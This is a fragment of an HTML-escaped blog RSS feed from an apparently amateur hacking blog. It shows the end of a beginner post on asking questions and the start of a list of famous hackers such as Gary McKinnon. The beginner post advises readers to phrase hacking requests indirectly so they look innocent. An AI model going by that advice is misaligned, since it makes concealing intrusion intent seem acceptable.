&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Amit-Spot &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;shall not support &lt;/span&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;illegal activities&lt;/span&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;To ask smart and viable questions read this:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;a href=&quot;http://catb.org/~esr/faqs/smart-questions.html#intro&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;http://catb.org/~esr/faqs/smart-questions.html#intro&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Now a bad example would be:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot;Yooz peepz yuz gotza help me 2 hax0r tHis wak0 sitE.&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;A good example would be:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;CODE :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Hello there,&lt;br /&gt;
&lt;br /&gt;
I’m really new to this site. Could you please kindly explain to me how this PHP exploitation works?&lt;br /&gt;
&lt;br /&gt;
Thanks in advance,&lt;br /&gt;
-username here-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Now this is the way to ask smart questions. Don’t ask directly about hacking, just phrase it in an indirect way.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;- Amit Tyagi&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/for-beginners-introduction-to-hacking.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fFUpEw8Q19BK1n33Y9flASSO9DBgc-dHJc1ka07BGEwxndwOUAc20MMZ0zM5DcSHYWC8V9wBkPMJ0IjDKphsUjs0GA5YZ02TNRZ59VprNtY7YxKySfjkcJJKjDaiAt88vPKWeLxIBWg/s72-c/Hacker_d70focus_1.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-3173855928624593662</guid><pubDate>Sun, 14 Nov 2010 06:27:00 +0000</pubDate><atom:updated>2011-02-24T03:57:06.819-08:00</atom:updated><title>List of World Best Top Hackers of All Time</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 16px; line-height: 18px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 20px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #99ff33; font-size: 20px;&quot;&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style=&quot;color: black;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; font-weight: bold; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br class=&quot;Apple-interchange-newline&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;400&quot; id=&quot;BLOGGER_PHOTO_ID_5159316681741331906&quot; src=&quot;http://bp2.blogger.com/_r8GjWqN6cvM/R5mTL9LwbcI/AAAAAAAAAsA/EImadeNwPKY/s400/hacker.jpg&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;&quot; width=&quot;400&quot; /&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Hackers&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, a group that consists of skilled computer enthusiasts.&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; A black hat&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; is a person who compromises the security of a computer system without permission from an authorized party, typically with malicious intent. The term white hat is used for a person who is ethically opposed to the abuse of computer systems, but is frequently no less skilled. The term cracker was coined by&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Richard Stallman&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; to provide an alternative to using the existing word hacker for this meaning.The somewhat similar activity of defeating copy prevention devices in software which may or may not be legal in a country&#39;s laws is actually software cracking....[&lt;/span&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Black_hat&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Wiki Source&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;List of Famous Hackers of All Time:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;There are numbers of Hackers in the world till date, Few has become famous by their&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Black hat work &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;and few of them are famous by their &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Ethical Hacking&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Below is separate list of World&#39;s All Time Best Hackers and Crackers. Although I represent them by Hackers only because what every they did, was wrong but one thing is sure they were &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Brilliant.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Hacking is&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;not a work of simple mind&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;,&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; only&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Intelligent Mind &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;can do that.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;1.Gary McKinnon-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/A3TABjObsUU/http://bp2.blogger.com/_r8GjWqN6cvM/R5iCiNLwbKI/AAAAAAAAApw/uRdAFOVTL70/s1600-h/Hackers_Gary.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159016897319038114&quot; src=&quot;http://bp2.blogger.com/_r8GjWqN6cvM/R5iCiNLwbKI/AAAAAAAAApw/uRdAFOVTL70/s320/Hackers_Gary.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Gary McKinnon, 40, accused of mounting the largest ever hack of United States government computer networks -- including&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Army, Air Force, Navy and NASA systems &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;The court has recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;US$700,000 (400,000 pounds; euro 588,000)&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; in damage.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;2.Jonathan James-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
